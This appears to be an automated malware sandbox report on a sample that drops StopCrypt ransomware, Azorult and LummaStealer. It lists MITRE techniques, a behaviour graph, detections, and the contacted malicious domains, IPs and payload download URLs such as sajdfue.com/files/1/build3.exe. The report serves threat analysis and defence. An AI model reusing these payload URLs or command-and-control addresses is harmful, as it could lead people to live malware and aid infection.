            Source: Yara matchFile source: 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.3157289895.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: build2.exe PID: 5968, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: build2.exe PID: 728, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting            		Valid Accounts21
            Windows Management Instrumentation            		1
            Scripting            		1
            Exploitation for Privilege Escalation            		11
            Deobfuscate/Decode Files or Information            		2
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		14
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium2
            Data Encrypted for Impact
            CredentialsDomainsDefault Accounts2
            Native API            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		1
            Abuse Elevation Control Mechanism            		1
            Credential API Hooking            		1
            Account Discovery            		Remote Desktop Protocol41
            Data from Local System            		21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Shared Modules            		1
            Registry Run Keys / Startup Folder            		1
            DLL Side-Loading            		2
            Obfuscated Files or Information            		1
            Credentials in Registry            		13
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Screen Capture            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Exploitation for Client Execution            		1
            Services File Permissions Weakness            		612
            Process Injection            		2
            Software Packing            		NTDS147
            System Information Discovery            		Distributed Component Object Model1
            Credential API Hooking            		125
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts13
            Command and Scripting Interpreter            		Network Logon Script1
            Registry Run Keys / Startup Folder            		1
            DLL Side-Loading            		LSA Secrets6101
            Security Software Discovery            		SSHKeylogging1
            Proxy            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable Media1
            PowerShell            		RC Scripts1
            Services File Permissions Weakness            		1
            File Deletion            		Cached Domain Credentials251
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Masquerading            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Modify Registry            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt251
            Virtualization/Sandbox Evasion            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron612
            Process Injection            		Network Sniffing1
            System Network Configuration Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
            Hidden Files and Directories            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
            Services File Permissions Weakness            		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1417167 Sample: 6uVlPQSJ4e.exe Startdate: 28/03/2024 Architecture: WINDOWS Score: 100 116 trad-einmyus.com 2->116 118 sdfjhuz.com 2->118 120 11 other IPs or domains 2->120 134 Snort IDS alert for network traffic 2->134 136 Found malware configuration 2->136 138 Malicious sample detected (through community Yara rule) 2->138 140 20 other signatures 2->140 13 6uVlPQSJ4e.exe 2->13         started        16 build2.exe 2->16         started        20 DB15.exe 2->20         started        22 3 other processes 2->22 signatures3 process4 dnsIp5 162 Detected unpacking (changes PE section rights) 13->162 164 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 13->164 184 2 other signatures 13->184 24 explorer.exe 32 23 13->24 injected 112 78.46.229.36, 443, 49741, 49743 HETZNER-ASDE Germany 16->112 114 steamcommunity.com 104.105.90.131, 443, 49738 AKAMAI-ASUS United States 16->114 82 C:\Users\user\AppData\...\softokn3[1].dll, PE32 16->82 dropped 84 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 16->84 dropped 86 C:\Users\user\AppData\...\mozglue[1].dll, PE32 16->86 dropped 88 10 other files (6 malicious) 16->88 dropped 166 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->166 168 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->168 170 Tries to harvest and steal ftp login credentials 16->170 186 2 other signatures 16->186 172 Detected unpacking (overwrites its own PE header) 20->172 174 Writes a notice file (html or txt) to demand a ransom 20->174 176 Injects a PE file into a foreign processes 20->176 29 DB15.exe 15 20->29         started        178 Multi AV Scanner detection for dropped file 22->178 180 Query firmware table information (likely to detect VMs) 22->180 182 Checks if the current machine is a virtual machine (disk enumeration) 22->182 file6 signatures7 process8 dnsIp9 126 trad-einmyus.com 81.94.159.197, 49707, 49710, 49720 WESTCALL-ASRU Russian Federation 24->126 128 sdfjhuz.com 189.232.22.59, 49708, 49714, 80 UninetSAdeCVMX Mexico 24->128 130 6 other IPs or domains 24->130 98 C:\Users\user\AppData\Roaming\gtdirat, PE32 24->98 dropped 100 C:\Users\user\AppData\Local\Temp\DB15.exe, PE32 24->100 dropped 102 C:\Users\user\AppData\Local\Temp\A0B.exe, PE32 24->102 dropped 108 2 other malicious files 24->108 dropped 146 System process connects to network (likely due to code injection or exploit) 24->146 148 Benign windows process drops PE files 24->148 150 Deletes itself after installation 24->150 152 Hides that the sample has been downloaded from the Internet (zone.identifier) 24->152 31 DB15.exe 24->31         started        34 A0B.exe 24->34         started        37 71C9.exe 24->37         started        39 5 other processes 24->39 104 C:\Users\user\_README.txt, ASCII 29->104 dropped 106 C:\Users\user\Desktop\...\PWCCAWLGRE.pdf, data 29->106 dropped 154 Modifies existing user documents (likely ransomware behavior) 29->154 file10 signatures11 process12 dnsIp13 188 Antivirus detection for dropped file 31->188 190 Detected unpacking (changes PE section rights) 31->190 192 Detected unpacking (overwrites its own PE header) 31->192 210 2 other signatures 31->210 41 DB15.exe 1 16 31->41         started        122 resergvearyinitiani.shop 104.21.94.2, 443, 49721, 49722 CLOUDFLARENETUS United States 34->122 194 Multi AV Scanner detection for dropped file 34->194 196 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 34->196 198 Query firmware table information (likely to detect VMs) 34->198 212 6 other signatures 34->212 200 UAC bypass detected (Fodhelper) 37->200 202 Machine Learning detection for dropped file 37->202 204 Found Tor onion address 37->204 45 cmd.exe 37->45         started        206 Uses cmd line tools excessively to alter registry or file data 39->206 208 Injects a PE file into a foreign processes 39->208 47 conhost.exe 39->47         started        49 reg.exe 1 1 39->49         started        51 DB15.exe 39->51         started        53 3 other processes 39->53 signatures14 process15 dnsIp16 132 api.2ip.ua 104.21.65.24, 443, 49711, 49712 CLOUDFLARENETUS United States 41->132 110 C:\Users\user\AppData\Local\...\DB15.exe, PE32 41->110 dropped 55 DB15.exe 41->55         started        58 icacls.exe 41->58         started        60 fodhelper.exe 45->60         started        62 conhost.exe 45->62         started        64 fodhelper.exe 45->64         started        66 fodhelper.exe 45->66         started        file17 process18 signatures19 144 Injects a PE file into a foreign processes 55->144 68 DB15.exe 55->68         started        73 71C9.exe 60->73         started        process20 dnsIp21 124 sajdfue.com 78.89.158.42, 49716, 49717, 49737 WATANIYATELECOM-ASKW Kuwait 68->124 90 C:\Users\user\AppData\Local\...\build3.exe, PE32 68->90 dropped 92 C:\Users\user\AppData\Local\...\build2.exe, PE32 68->92 dropped 94 C:\Users\user\AppData\Local\...\build3[1].exe, PE32 68->94 dropped 96 6 other malicious files 68->96 dropped 142 Modifies existing user documents (likely ransomware behavior) 68->142 75 build3.exe 68->75         started        78 powershell.exe 73->78         started        file22 signatures23 process24 signatures25 156 Multi AV Scanner detection for dropped file 75->156 158 Sample uses process hollowing technique 75->158 160 Injects a PE file into a foreign processes 75->160 80 conhost.exe 78->80         started        process26

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            6uVlPQSJ4e.exe32%ReversingLabs
            6uVlPQSJ4e.exe100%AviraHEUR/AGEN.1313019
            6uVlPQSJ4e.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build2[1].exe100%AviraHEUR/AGEN.1352954
            C:\Users\user\AppData\Local\Temp\DB15.exe100%AviraHEUR/AGEN.1313019
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build3[1].exe100%AviraTR/AD.MalwareCrypter.llbpm
            C:\Users\user\AppData\Local\Temp\71C9.exe100%AviraTR/Crypt.EPACK.Gen2
            C:\Users\user\AppData\Local\Temp\DB15.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build3[1].exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\71C9.exe100%Joe Sandbox ML
            C:\ProgramData\freebl3.dll0%ReversingLabs
            C:\ProgramData\mozglue.dll0%ReversingLabs
            C:\ProgramData\msvcp140.dll0%ReversingLabs
            C:\ProgramData\nss3.dll0%ReversingLabs
            C:\ProgramData\softokn3.dll0%ReversingLabs
            C:\ProgramData\vcruntime140.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqlm[1].dll0%ReversingLabs
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build2[1].exe75%ReversingLabsWin32.Ransomware.StopCrypt
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build3[1].exe87%ReversingLabsWin32.Trojan.Azorult
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll0%ReversingLabs
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll0%ReversingLabs
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll0%ReversingLabs
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll0%ReversingLabs
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll0%ReversingLabs
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\A0B.exe92%ReversingLabsWin32.Trojan.LummaStealer
            C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe75%ReversingLabsWin32.Ransomware.StopCrypt
            C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe87%ReversingLabsWin32.Trojan.Azorult
            C:\Users\user\AppData\Roaming\gtdirat32%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://word.office.comM0%URL Reputationsafe
            https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
            technologyenterdo.shop0%URL Reputationsafe
            https://outlook.come0%URL Reputationsafe
            https://blockchain.infoindex0%URL Reputationsafe
            http://schemas.micro0%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            https://s.ytimg.com;0%Avira URL Cloudsafe
            https://78.46.229.36/freebl3.dllZ0%Avira URL Cloudsafe
            https://78.46.229.36/0%Avira URL Cloudsafe
            https://outlook.comt0%Avira URL Cloudsafe
            https://www.gstatic.cn/recaptcha/0%Avira URL Cloudsafe
            http://sdfjhuz.com/dl/build2.exeruneer100%Avira URL Cloudmalware
            https://78.46.229.36/2)0%Avira URL Cloudsafe
            https://jennyilis.com/e0cbefcb1af40c7d4aff4aca26621a98.exe100%Avira URL Cloudmalware
            http://sajdfue.com/test1/get.php100%Avira URL Cloudmalware
            http://trade-inmyus.com/index.php100%Avira URL Cloudmalware
            https://78.46.229.36FIDAK0%Avira URL Cloudsafe
            https://78.46.229.36/softokn3.dll0%Avira URL Cloudsafe
            http://sdfjhuz.com/dl/build2.exe$run100%Avira URL Cloudmalware
            http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
            https://78.46.229.36/nss3.dll0%Avira URL Cloudsafe
            https://78.46.229.36/tera)I0%Avira URL Cloudsafe
            https://lv.queniujq.cn0%Avira URL Cloudsafe
            http://sajdfue.com/test1/get.phpb100%Avira URL Cloudmalware
            http://https://_bad_pdb_file.pdb0%Avira URL Cloudsafe
            http://sajdfue.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4100%Avira URL Cloudmalware
            http://sajdfue.com/files/1/build3.exe100%Avira URL Cloudmalware
            http://sajdfue.com/files/1/build3.exe$run100%Avira URL Cloudmalware
            https://78.46.229.360%Avira URL Cloudsafe
            http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionhttp://3ebu257qh2dlauxqj7cgv3i50%Avira URL Cloudsafe
            https://78.46.229.36/vcruntime140.dll0%Avira URL Cloudsafe
            http://sajdfue.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true100%Avira URL Cloudmalware
            https://78.46.229.36/ss3.dll0%Avira URL Cloudsafe
            http://sajdfue.com/files/1/build3.exerun85100%Avira URL Cloudmalware
            problemregardybuiwo.fun100%Avira URL Cloudmalware
            https://resergvearyinitiani.shop/api5100%Avira URL Cloudmalware
            https://78.46.229.36/msvcp140.dll:T0%Avira URL Cloudsafe
            https://resergvearyinitiani.shop/T100%Avira URL Cloudmalware
            https://recaptcha.net/recaptcha/;0%Avira URL Cloudsafe
            http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
            http://sdfjhuz.com/dl/build2.exe:100%Avira URL Cloudmalware
            https://78.46.229.36/nss3.dll4I0%Avira URL Cloudsafe
            https://resergvearyinitiani.shop/.100%Avira URL Cloudmalware
            https://broadcast.st.dl.eccdnx.com0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            resergvearyinitiani.shop
            		104.21.94.2
            		truetrue
              		unknown
              sdfjhuz.com
              		189.232.22.59
              		truetrue
                		unknown
                sajdfue.com
                		78.89.158.42
                		truetrue
                  		unknown
                  m2reg.ulm.ac.id
                  		103.23.232.80
                  		truetrue
                    		unknown
                    nessotechbd.com
                    		192.185.16.114
                    		truetrue
                      		unknown
                      steamcommunity.com
                      		104.105.90.131
                      		truefalse
                        		high
                        cdn.discordapp.com
                        		162.159.129.233
                        		truefalse
                          		high
                          api.2ip.ua
                          		104.21.65.24
                          		truefalse
                            		high
                            drive.google.com
                            		172.253.115.138
                            		truefalse
                              		high
                              jennyilis.com
                              		172.67.207.127
                              		truetrue
                                		unknown
                                trad-einmyus.com
                                		81.94.159.197
                                		truetrue
                                  		unknown
                                  kilperdoper.com
                                  		172.67.156.20
                                  		truetrue
                                    		unknown
                                    api.msn.com
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://trade-inmyus.com/index.phptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://sajdfue.com/test1/get.phptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://jennyilis.com/e0cbefcb1af40c7d4aff4aca26621a98.exetrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://78.46.229.36/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      technologyenterdo.shoptrue
                                      • URL Reputation: safe
                                      		unknown
                                      https://78.46.229.36/softokn3.dllfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://78.46.229.36/nss3.dllfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://sajdfue.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://sajdfue.com/files/1/build3.exetrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://78.46.229.36/vcruntime140.dllfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://sajdfue.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=truetrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      problemregardybuiwo.funtrue
                                      • Avira URL Cloud: malware
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabA0B.exe, 00000017.00000003.3013927833.0000000003AD7000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3316804996.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=A0B.exe, 00000017.00000003.3013927833.0000000003AD7000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3316804996.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2110113315.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=GRA9build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.2ip.ua/geo.json-DB15.exe, 00000011.00000002.4519701063.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000013.00000003.2851421571.00000000005DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://word.office.comMexplorer.exe, 00000002.00000000.2112529074.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.gstatic.cn/recaptcha/build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://deff.nelreports.net/api/report?cat=msnexplorer.exe, 00000022.00000003.3205641737.0000000007D09000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3201833144.0000000007D0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3221948126.0000000007D1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englibuild2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://outlook.comtexplorer.exe, 00000022.00000003.3237926713.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3199766395.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3193350386.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3204949143.000000000950D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.valvesoftware.com/legal.htmbuild2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.youtube.combuild2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://78.46.229.36/2)build2.exe, 00000029.00000002.3569722785.00000000009C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://78.46.229.36/freebl3.dllZbuild2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://api.2ip.ua/geo.jsonoDDB15.exe, 00000016.00000002.2980820218.0000000000698000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://sdfjhuz.com/dl/build2.exeruneerDB15.exe, 00000013.00000002.4517742104.00000000005D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackbuild2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=KrKRjQbCfNh0&build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://s.ytimg.com;build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              https://turnitin.com/robot/crawlerinfo.html)cannot71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpfalse
                                                                		high
                                                                https://wns.windows.com/eexplorer.exe, 00000002.00000000.2110427730.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.reddit.com/DB15.exe, 00000013.00000003.2940599862.00000000097E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Zj8Lt-uyXH8R&amp;build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://78.46.229.36FIDAKbuild2.exe, 00000029.00000002.3568020251.0000000000567000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		low
                                                                      https://78.46.229.36/tera)Ibuild2.exe, 00000029.00000002.3569722785.00000000009C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://api.2ip.ua/geo.json_PDB15.exe, 00000016.00000002.2980820218.0000000000698000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://api.2ip.ua/%4RDB15.exe, 0000000C.00000002.2840859633.000000000075A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://api.2ip.ua/geo.jsonlDB15.exe, 0000001C.00000003.3060772221.0000000000759000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 0000001C.00000002.3062137108.000000000075A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=A0B.exe, 00000017.00000003.3013927833.0000000003AD7000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3316804996.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://sdfjhuz.com/dl/build2.exe$runDB15.exe, 00000013.00000002.4517742104.0000000000587000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
